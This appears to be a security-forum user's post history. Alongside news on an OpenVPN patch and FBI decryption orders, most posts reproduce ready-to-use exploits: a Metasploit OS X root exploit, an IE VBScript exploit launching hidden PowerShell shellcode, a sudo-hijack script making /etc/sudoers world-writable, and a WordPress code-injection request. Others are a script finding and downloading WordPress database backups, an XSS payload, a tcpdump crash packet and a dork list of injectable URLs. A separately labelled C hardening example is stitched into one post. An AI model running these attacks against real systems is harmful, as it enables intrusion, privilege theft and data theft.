Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. OpenVPN has patched a denial-of-service vulnerability which authenticated users could trigger by sending malicious packets.

    The flaw (CVE-2014-8104) is most hurtful to VPN service providers and was reported by researcher Dragana Damjanovic to OpenVPN last month.

    Maintainers said in an advisory issued this morning that the flaw affected versions back to at least 2005 and allowed TLS-authenticated clients to crash the server by sending a too-short control channel packet to the server.

    "In other words this vulnerability is denial of service only," they said. "An OpenVPN server can be easily crashed using this vulnerability by an authenticated client. However, we are not aware of this exploit being in the wild before we released a fixed version.

    "Confidentiality and authenticity of traffic are not affected."

    The impact of the vulnerability was reduced since attackers had to be authenticated clients, meaning client certificates and TLS would be sufficient safety provided trusted machines were not popped.

    VPN service providers and other servers using the 'client-cert-not-required' and username/password access were exposed since all users could acquire client certificates and TLS authentication keys.

    "The first fixed, non-vulnerable version is 2.0.11 - you should upgrade to it as soon as possible, especially if you suspect some clients might be malicious," the maintainers said.

    The OpenVPN 3.x codebase used in most OpenVPN Connect clients on Android and iOS was not vulnerable.

    A fixed version of OpenVPN (2.3.6) was released 1st Dec 2014 at around 18:00 UTC. The fix was also backported to the OpenVPN 2.2 branch and released in OpenVPN 2.2.3, a source-only release.

    So far VPN providers CryptoStorm and Perfect Privacy have patched.

    Source
  2. Ha ha, interesting, but who has heard of these apart from Avast...
  3. # Exploit Title: SQL Buddy Remote Code Execution
    # Date: November 29 2014
    # Exploit Author: Fady Osman (@fady_osman)
    # Youtube Channel : https://www.youtube.com/user/cutehack3r
    # Vendor Homepage: http://sqlbuddy.com/
    # Software Link: https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip
    # Version: SQL Buddy 1.3.3
    # Tested on: Kubuntu 14.10

    SQLBuddy provides a web based mysql administration and it's included in packages like wamp server.

    SQL Buddy suffers from a remote code execution. This happens due to the fact that it allows the user to login using any server he wants and that it allows the user to export data from the database to a file on the webserver.

    In order to exploit this bug do the following steps:

    1- Use a sql server you control and have a valid credentials for (You can use one of the free mysql hosting services).
    2- Create a database and a table with one column of type text.
    3- Insert the php code you want to execute into that table.
    4- Choose the previously created table from the left menu.
    5- Click Export from the top menu.
    6- Choose CSV format.
    7- Choose "Text File" and name the file with php extension for example shell.php.

    The exported file will be at : sqlbuddy/exports/ assuming you installed sqlbuddy in a folder named sqlbuddy.

    --
    Regards,
    Fady Osman
    about.me/Fady_Osman <http://about.me/Fady_Osman>

    Source
  4. @quadxenon it was a joke. Still, 2 billion views is something...
  5. Thanks, I'll get some books and post them on RST too.
  6. Man, when these guys go on Google, the Google people say they're getting flooded. On://2 billion views ....
  7. Keep searching, maybe you'll get lucky.
  8. I'm sitting here wondering who is dumber, M. Badea or Gadea?
  9. @Eddie91 cheers, man, they are very nice, plus I found something I had been looking for for a long time: Splatter Displacement Action | GraphicRiver. Thanks once again.
  10. It's almost certainly from the plant's electromagnetic field.
  11. Aerosol

    Hello!

    Hi, by the way, go easy on the ":) :X" and the like, we're not on Messenger.
  12. 1. Download the latest Java SE SDK version.

    Java SE - Downloads | Oracle Technology Network | Oracle

    At the time of writing the filename and version was jdk-7u17-linux-x64.tar.gz

    2. Untar the archive

        tar -xzvf /root/jdk-7u17-linux-x64.tar.gz
        mv jdk1.7.0_17 /opt
        cd /opt/jdk1.7.0_17

    3. This step registers the downloaded version of Java as an alternative, and switches it to be used as the default:

        update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_17/bin/java 1
        update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_17/bin/javac 1
        update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so 1
        update-alternatives --set java /opt/jdk1.7.0_17/bin/java
        update-alternatives --set javac /opt/jdk1.7.0_17/bin/javac
        update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so

    Source
  13. Source

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'rex'

    class Metasploit3 < Msf::Exploit::Local
      Rank = ManualRanking # Can cause kernel crash

      include Msf::Post::File
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper

      def initialize(info={})
        super(update_info(info,
          'Name'          => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
          'Description'   => %q{
            A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory
            corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
            pointers can also be leaked, allowing a full kASLR bypass.

            Tested on Mavericks 10.9.5, and should work on previous versions.

            The issue has been patched silently in Yosemite.
          },
          'License'       => MSF_LICENSE,
          'Author'        =>
            [
              'Ian Beer', # discovery, advisory, publication, and a most excellent blog post
              'joev'      # copy/paste monkey
            ],
          'References'    =>
            [
              [ 'CVE', '2014-4404' ],
              [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],
              # Heap overflow:
              [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],
              # kASLR defeat:
              [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]
            ],
          'Platform'      => 'osx',
          'Arch'          => ARCH_X86_64,
          'SessionTypes'  => [ 'shell', 'meterpreter' ],
          'Targets'       => [
            [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]
          ],
          'DefaultTarget' => 0,
          'DisclosureDate' => 'Sep 24 2014'
        ))
      end

      # Reports the host as vulnerable when its OS X version is below 10.10
      def check
        if ver_lt(osx_ver, "10.10")
          Exploit::CheckCode::Vulnerable
        else
          Exploit::CheckCode::Safe
        end
      end

      def exploit
        exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
        binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
        binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
        exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
        payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

        print_status("Writing exploit file as '#{exploit_file}'")
        write_file(exploit_file, binary_exploit)
        register_file_for_cleanup(exploit_file)

        print_status("Writing payload file as '#{payload_file}'")
        write_file(payload_file, binary_payload)
        register_file_for_cleanup(payload_file)

        print_status("Executing payload...")
        cmd_exec("chmod +x #{exploit_file}")
        cmd_exec("chmod +x #{payload_file}")
        cmd_exec("#{exploit_file} #{payload_file}")
      end

      # Product version string as reported by sw_vers
      def osx_ver
        cmd_exec("sw_vers -productVersion").to_s.strip
      end

      # True when version string a is lower than version string b
      def ver_lt(a, b)
        Gem::Version.new(a) < Gem::Version.new(b)
      end
    end
  14. The FBI has made it no secret that it hates Apple and Google's efforts to encrypt files in your smartphones and tablets. Now court documents have emerged showing just how far the Feds are willing to go to decrypt citizens' data.

    The paperwork has shown two cases where federal prosecutors have cited the All Writs Act – which was enacted in 1789 as part of the Judiciary Act – to force companies to decrypt information on gadgets.

    The Act, which was signed into law by none other than George Washington and later revised in the 20th century, gives the courts the right to...

        issue all writs necessary or appropriate in aid of their respective jurisdictions and agreeable to the usages and principles of law.

    That's a pretty broad remit, but the Feds think it's just the thing to force Apple and others to break down privacy protections.

    Last month, New York prosecutors successfully persuaded a judge that the ancient law could be used to force an unnamed smartphone manufacturer to help unlock a phone allegedly used in a credit card fraud case. The judge ordered the manufacturer to offer "reasonable technical assistance" to make the phone's contents available.

    In a second case, in the northern California federal court, prosecutors specifically named Apple in a similar case using the All Writs Act. Documents obtained by Ars Technica show federal law enforcement sought to get Apple to unlock an iPhone 5S as part of a criminal case.

    The court filing states investigators were unwilling to try and open the iPhone for fear of damaging a crucial piece of evidence. They asked the courts to force Apple to give them a hand in safely extracting data from the passcode-protected phone.

    It's an interesting legal tactic, but the Feds may find out the hard way that the All Writs Act has its limitation.

    The argument used by Apple and Google over encryption is that, even if they wanted to help the Feds, they can't do anything about it – because modern iOS and Android encrypts data in a way that only the owner can decrypt. Apple and Google say they don't hold any skeleton keys to devices, although sensitive data may end up in the cloud for the cops to seize.

    "The court orders contemplate allowing companies to file an objection and if they can’t do it then Apple and Google would spend real time fighting this," EFF legal fellow Andrew Crocker told The Register.

    As for whether or not this law could be used to force smartphone sellers to include a backdoor or spyware for police, or even a front door as the FBI says it wants, Crocker said that such use of the All Writs Act isn't "a settled legal issue," and the EFF would be taking a long, hard look at any attempts to do so.

    Source
  15. @misefalfaie I know, man. Bratuleanu, note that misefalfaie is making fun of you, my friend; if you had looked at the end, the source was written there, but oh well, you just had to comment too...
  16. @aelius thanks for the addition. Hm, I saw it was posted on 20 Nov 2014 on Packet Storm, I searched the forum and found nothing, so I figured, oh well...
  17. @Ganav although I have nothing to do with this: this andrey is actually the scammer, https://rstforums.com/forum/92884-un-tepar-se-alge-cu-situl-descoperit.rst look here and you'll see for yourself + the theme is nulled, so he didn't pay a cent for it + he got tangled up in his own lies
  18. tcpdump 4.6.2 AOVD Unreliable Output
    tcpdump 4.6.2 Geonet Denial Of Service
    tcpdump 4.6.2 OSLR Denial Of Service

    Ha ha, I also found a few interesting exploits.

    CVE-2014-8767 tcpdump denial of service in verbose mode using malformed OLSR payload

    1. Background

    tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

    2. Summary Information

    It was found out that malformed network traffic (OLSR-based) can lead to an application crash (denial of service) if verbose output of tcpdump monitoring the network is used.

    3. Technical Description

    The application decoder for the OLSR protocol fails to perform external input validation and performs insufficient checking on length computations leading to an unsafe decrement and underflow in the function

        olsr_print (const u_char *pptr, u_int length, int is_ipv6)

    In this function msg_len is extracted from the input without sufficient checks and subtracted sizeof(struct olsr_msg4) which leads to an underflow of msg_tlen which is used to call olsr_print_neighbor() which will crash. In case DNS reverse lookup is enabled, this will also lead to a large amount of invalid DNS reverse lookups.

    To reproduce start tcpdump on a network interface

        sudo tcpdump -i lo -s 0 -n -v

    (running the program with sudo might hide the segfault message on certain environments, see dmesg for details)

    and use the following python program to generate a frame on the network (might also need sudo):

        #!/usr/bin/env python
        from socket import socket, AF_PACKET, SOCK_RAW
        s = socket(AF_PACKET, SOCK_RAW)
        s.bind(("lo", 0))

        olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"

        s.send(olsr_frame)

    4. Affected versions

    Affected versions are 3.9.6 through 4.6.2

    5. Fix

    The problem is fixed in the upcoming version tcpdump 4.7.0

    6. Advisory Timeline

    2014-11-08 Discovered
    2014-11-09 Requested CVE
    2014-11-11 Reported vendor by email
    2014-11-12 Vendor made a fix available as repository patch
    2014-11-13 CVE number received
    2014-11-13 Published CVE advisory

    7. Credit

    The issue was found by Steffen Bauch
    Twitter: @Steffenbauch
    http://steffenbauch.de

    using a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.
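
The length handling the advisory above describes, as an added C example that is not tcpdump's source and not part of the original post: the unchecked subtraction beside a bounds-checked version, plus a walker over consecutive messages. The header layout, the function names and the sample bytes are assumptions constructed for illustration.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed layout of an IPv4 OLSR message header (12 bytes); illustrative,
 * not copied from tcpdump. msg_len counts the header plus the body. */
struct olsr_msg4 {
    uint8_t msg_type;
    uint8_t vtime;
    uint8_t msg_len[2];      /* big-endian */
    uint8_t originator[4];
    uint8_t ttl;
    uint8_t hopcount;
    uint8_t msg_seq[2];
};

static unsigned int read_be16(const uint8_t *p)
{
    return ((unsigned int)p[0] << 8) | p[1];
}

/* The pattern the advisory describes: msg_len is taken from the packet and
 * the header size is subtracted with no lower-bound check. The arithmetic is
 * unsigned, so a msg_len below 12 wraps to a value close to UINT_MAX.
 * The caller must supply at least sizeof(struct olsr_msg4) bytes. */
unsigned int body_len_unchecked(const uint8_t *pptr)
{
    unsigned int msg_len = read_be16(pptr + offsetof(struct olsr_msg4, msg_len));
    return msg_len - (unsigned int)sizeof(struct olsr_msg4);
}

/* Hardened form: returns 0 and stores the body length, or -1 when the
 * message must be rejected before any body parsing happens. */
int body_len_checked(const uint8_t *pptr, size_t caplen, size_t *body_len)
{
    size_t msg_len;

    if (caplen < sizeof(struct olsr_msg4))
        return -1;                      /* header itself is truncated */
    msg_len = read_be16(pptr + offsetof(struct olsr_msg4, msg_len));
    if (msg_len < sizeof(struct olsr_msg4))
        return -1;                      /* subtraction would underflow */
    if (msg_len > caplen)
        return -1;                      /* claims more bytes than captured */
    *body_len = msg_len - sizeof(struct olsr_msg4);
    return 0;
}

/* Walk consecutive messages in a buffer. Returns how many were well formed,
 * or -1 as soon as one fails validation. */
int count_messages(const uint8_t *buf, size_t len)
{
    int n = 0;

    while (len > 0) {
        size_t body;
        if (body_len_checked(buf, len, &body) != 0)
            return -1;
        buf += sizeof(struct olsr_msg4) + body;
        len -= sizeof(struct olsr_msg4) + body;
        n++;
    }
    return n;
}

/* Constructed sample data (not taken from the advisory's frame). */
const uint8_t GOOD_MSGS[] = {
    /* message 1: msg_len = 16 (12-byte header + 4-byte body) */
    0x01, 0x00, 0x00, 0x10, 0x0a, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01,
    0xde, 0xad, 0xbe, 0xef,
    /* message 2: msg_len = 12 (header only) */
    0x02, 0x00, 0x00, 0x0c, 0x0a, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x02,
};
const uint8_t SHORT_LEN_MSG[] = {
    /* msg_len = 2, smaller than the header that carries it */
    0x02, 0x00, 0x00, 0x02, 0x0a, 0x00, 0x00, 0x03, 0x01, 0x00, 0x00, 0x03,
};

int main(void)
{
    size_t body = 0;

    printf("unchecked body length for msg_len=2: %u (UINT_MAX is %u)\n",
           body_len_unchecked(SHORT_LEN_MSG), UINT_MAX);
    printf("checked result for msg_len=2: %d\n",
           body_len_checked(SHORT_LEN_MSG, sizeof SHORT_LEN_MSG, &body));
    printf("well-formed buffer holds %d messages\n",
           count_messages(GOOD_MSGS, sizeof GOOD_MSGS));
    return 0;
}
```
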
  19. What is sudo's grace period?

    When a user first calls sudo to launch some commands as root he will be asked for his own password. But if the user calls sudo again in the following 5 minutes, he won't be asked for the same password. That's because the password is cached in memory for a period of time called the « grace period ». This grace period mechanism is activated by default on every system I know where sudo can be found (Linux distros, OSX, BSDs…)

    Here is the exploit code (sudo_grace_period_exploit.sh):

        function bash_history {
            if [ $? -ne 1 ]  # previous command was successful
            then
                if [ -z "${PWNED+xxx}" ]  # this test is used to check if the system was already pwned
                then
                    history 1 | grep -q -E '^[[:space:]]*[0-9]+ sudo '
                    if [ $? -eq 0 ]  # previous command is a sudo one
                    then
                        sudo chmod 777 /etc/sudoers 2> /dev/null
                        PWNED="yes"
                        unset PROMPT_COMMAND 2> /dev/null
                    fi
                fi
            fi
        }
        PROMPT_COMMAND=bash_history

    For more: http://dl.packetstormsecurity.net/1411-exploits/exploiting_sudo_grace_period.pdf

    In my opinion this is very interesting. Spare 5 minutes of your time, it's worth it!
  20. <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <pre> |--------------------------------------------------------------------------| | Title: OLE Automation Array Remote Code Execution => Pre IE11 | | Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ | | Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) | | Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual | | Usage: http://www.fuzzysecurity.com/exploits/21.html | |--------------------------------------------------------------------------| Very nice black-magic yuange, don't think it went unnoticed that you have been popping shells since 2009 ??????????? |--------------------------------------------------------------------------| </pre> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") 'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!' 
payload="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" command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" params="-NoP -NonI -Exec Bypass -Command " & command 'Original POC yuange 'set shell=createobject("Shell.Application") 'shell.ShellExecute "notepad.exe" 'With UAC 'shell.ShellExecute "powershell", params, "", "runas", 0 'Without UAC shell.ShellExecute "powershell", params, "", "", 0 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 
j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html> Source
  21. Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
    CVE: CVE-2014-8877
    Plugin: CM Download Manager plugin
    Vendor: CreativeMinds - https://www.cminds.com/
    Product: https://wordpress.org/plugins/cm-download-manager/
    Affected version: 2.0.0 and previous versions
    Fixed version: 2.0.4
    Google dork: inurl:cmdownloads
    Reported by: Phi Le Ngoc - phi.n.le@itas.vn
    Credits to ITAS Team - www.itas.vn

    ::DESCRIPTION::

    The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to gain full control of the application and the ability to use any operating system functions that are available to the scripting environment.

        GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
        Host: target.com
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879
        Connection: keep-alive

    Vulnerable file: /wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php

    Vulnerable code: (Line: 130 -> 158)

        public static function alterSearchQuery($search, $query)
        {
            if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
            {
                global $wpdb;
                $search_term = $_GET['CMDsearch'];
                if( !empty($search_term) )
                {
                    $search = '';
                    $query->is_search = true;
                    // added slashes screw with quote grouping when done early, so done later
                    $search_term = stripslashes($search_term);
                    preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
                    $terms = array_map('_search_terms_tidy', $matches[0]);
                    $n = '%';
                    $searchand = ' AND ';
                    foreach((array) $terms as $term)
                    {
                        $term = esc_sql(like_escape($term));
                        $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
                    }
                    // $search_term (raw $_GET['CMDsearch']) is concatenated into the code string given to create_function()
                    add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
                    remove_filter('posts_request', 'relevanssi_prevent_default_request');
                    remove_filter('the_posts', 'relevanssi_query');
                }
            }
            return $search;
        }

    ::SOLUTION::

    Update to version 2.0.4

    ::DISCLOSURE::

    2014-11-08 initial vendor contact
    2014-11-10 vendor response
    2014-11-10 vendor confirmed
    2014-11-11 vendor release patch
    2014-11-14 public disclosure

    ::REFERENCE::

    https://downloadsmanager.cminds.com/release-notes/
    http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en

    ::COPYRIGHT::

    Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP.

    Source
  22. #!/bin/bash #Larry W. Cashdollar, @_larry0 #Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on #20141031 assumes the wordpress database is wordpress and the table prefix is wp_ #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/ #run ./exp targetsite DATE="20141031"; #Date to search if [ ! -e rainbow ]; then cat << -EOF- > rbow.c /*Create rainbow table for guessing wp-backup-db v2.2.4 backup path Larry W. Cashdollar*/ #include <stdio.h> int main (void) { char string[16] = "0123456789abcdef"; int x, y, z, a, b; for (x = 0; x < 16; x++) for (y = 0; y < 16; y++) for (z = 0; z < 16; z++) for (a = 0; a < 16; a++) for (b = 0; b < 16; b++) printf ("%c%c%c%c%c\n", string[x], string[y], string[z], string[a], string[b]); return(0); } -EOF- echo "[+] Compiling rbow.c" gcc rbow.c -o rbow echo "[+] Creating rainbow table..." ./rbow > rainbow fi if [ ! -e found.txt ]; then Z=0 K=`wc -l rainbow|awk '{print $1}'`; echo "[+] Searching...."; for x in `cat rainbow`; do CPATH="http://$1/wp-content/backup-$x/"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo $x > found.txt; break; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=6;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done else x=`cat found.txt`; fi # Now that we have the directory lets try to locate the database backup file. 
K=999; for y in `seq -w 0 999`; do CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Database backup $CPATH Found"; echo "[+] Received $RESULT"; wget $CPATH exit; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=2;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done Source
  23. WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure

    ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    [+] Author : KnocKout
    [~] Contact : knockout@e-mail.com.tr
    [~] HomePage : http://h4x0resec.blogspot.com
    [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )

    ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    |~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
    |~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
    |~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
    |~Vulnerability Style : FULL PATH DISCLOSURE
    |[~]Date : "26.11.2014"
    |[~]Tested on : Kali Linux, Windows 7
    |DORK: inurl:html5plus/html5full.php
    ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    | DEMO :

    ==============[Exploitation]===============================
    http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php

    Source
  24. WordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability

    ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    [+] Author : KnocKout
    [~] Contact : knockout@e-mail.com.tr
    [~] HomePage : http://h4x0resec.blogspot.com
    [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )

    ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    |~App. : WordPress (Sexy Squeeze Pages) Plugin
    |~Software: http://instasqueeze.com/jv/
    |~Vulnerability Style : Cross Site Scripting
    |[~]Date : "26.11.2014"
    |[~]Tested on : Kali Linux, Windows 7
    |DORK: inurl:wp-content/plugins/instasqueeze
    ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    | DEMO :

    ==============[Exploitation]===============================
    /instasqueeze/lp/index.php
    id parameter is ( index.php ) not safe.

    HTTP://[VICTIM]/wp-content/plugins/instasqueeze/lp/index.php?id="><script>alert(1337)</script>

    Source
  25. Credit's : The Phant0m
details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= modules/forum/index.php?topic_id= feature.php?id= products/Blitzball.htm?id= profile_print.php?id= questions.php?questionid= html/scoutnew.php?prodid= main/index.php?action= ********.php?cid= ********.php?cid= news.php?type= index.php?page= viewthread.php?tid= summary.php?PID= news/latest_news.php?cat_id= index.php?cPath= category.php?CID= index.php?pid= more_details.php?id= specials.php?osCsid= search/display.php?BookID= articles.php?id= print.php?sid= page.php?id= more_details.php?id= newsite/pdf_show.php?id= shop/category.php?cat_id= shopcafe-shop-product.php?bookId= shop/books_detail.php?bookID= index.php?cPath= more_details.php?id= news.php?id= more_details.php?id= shop/books_detail.php?bookID= more_details.php?id= blog.php?blog= index.php?pid= prodotti.php?id_cat= category.php?CID= more_details.php?id= poem_list.php?bookID= more_details.php?id= content.php?categoryId= authorDetails.php?bookID= press_release.php?id= item_list.php?cat_id= colourpointeducational/more_details.php?id= index.php?pid= download.php?id= shop/category.php?cat_id= i-know/content.php?page= store/index.php?cat_id= yacht_search/yacht_view.php?pid= pharmaxim/category.php?cid= print.php?sid= specials.php?osCsid= store.php?cat_id= category.php?cid= displayrange.php?rangeid= product.php?id= csc/news-details.php?cat= products-display-details.php?prodid= stockists_list.php?area_id= news/newsitem.php?newsID= index.php?pid= newsitem.php?newsid= category.php?id= news/newsitem.php?newsID= details.php?prodId= publications/publication.php?id= purelydiamond/products/category.php?cat= category.php?cid= product/detail.php?id= news/newsitem.php?newsID= details.php?prodID= item.php?item_id= edition.php?area_id= page.php?area_id= view_newsletter.php?id= library.php?cat= categories.php?cat= page.php?area_id= categories.php?cat= publications.php?id= item.php?sub_id= page.php?area_id= 
